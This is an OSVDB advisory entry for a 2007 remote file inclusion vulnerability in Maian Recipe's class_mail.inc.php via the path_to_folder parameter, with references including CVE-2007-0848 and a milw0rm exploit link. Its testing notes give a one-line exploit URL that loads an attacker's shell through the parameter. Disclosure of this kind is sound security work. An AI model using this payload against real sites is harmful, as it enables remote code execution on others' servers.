Maian Recipe classes/class_mail.inc.php path_to_folder Variable Remote File Inclusion

2007-02-07T06:03:46
ID OSVDB:33125
Type osvdb
Reporter OSVDB
Modified 2007-02-07T06:03:46

Description

Manual Testing Notes

http://[target]/path/classes/class_mail.inc.php?path_to_folder=[shell]

References:

Secunia Advisory ID:24074 Other Advisory URL: http://milw0rm.com/exploits/3284 Mail List Post: http://www.attrition.org/pipermail/vim/2007-February/001299.html ISS X-Force ID: 32346 FrSIRT Advisory: ADV-2007-0537 CVE-2007-0848